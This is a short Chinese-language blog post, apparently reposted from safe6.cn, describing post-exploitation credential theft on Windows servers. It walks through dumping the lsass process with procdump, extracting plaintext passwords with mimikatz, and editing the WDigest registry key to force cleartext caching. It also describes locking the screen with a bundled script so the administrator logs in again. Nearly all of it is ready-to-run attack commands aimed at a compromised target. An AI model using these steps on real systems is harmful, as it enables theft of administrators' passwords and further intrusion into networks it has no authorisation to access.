win服务器使用procdump配合mimikatz读明文密码

没穿底裤 2021年1月18日21:28:43评论176 views字数 745阅读2分29秒阅读模式
摘要

procdumpmimikatz明文密码 使用mimikatz读明文密码已经是老套路了。直接开始正文
前提条件:拿下了admin权限,管理员用密码登录机器,服务器运行lsass.exe进程(有时候任务管理器看不到进程)。

procdumpmimikatz明文密码

前言

使用mimikatz读明文密码已经是老套路了。直接开始正文
前提条件:拿下了admin权限,管理员用密码登录机器,服务器运行lsass.exe进程(有时候任务管理器看不到进程)。

工具下载

打包下载

使用

先把procdump传到目标鸡然后导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 

然后把lsass.dmp拖回mimikatz的目录读密码,依次执行下面命令

mimikatz privilege::debug sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords 

最后明文密码就出来了。

问题

如果出现密码为null
直接修改注册表来让Wdigest Auth保存明文口令:

reg add HKLM/SYSTEM/CurrentControlSet/Control/SecurityProviders/WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 

然后想办法让管理员重新登录(包里已经附带锁屏脚本)
输入如下命令

powershell -file lock-screen.ps1 

系统直接用mimikatz抓密码出现如下报错也可以用此方法。
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

win服务器使用procdump配合mimikatz读明文密码

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

win服务器使用procdump配合mimikatz读明文密码

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-08-19

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2021年1月18日21:28:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   win服务器使用procdump配合mimikatz读明文密码https://cn-sec.com/archives/247505.html

发表评论

匿名网友 填写信息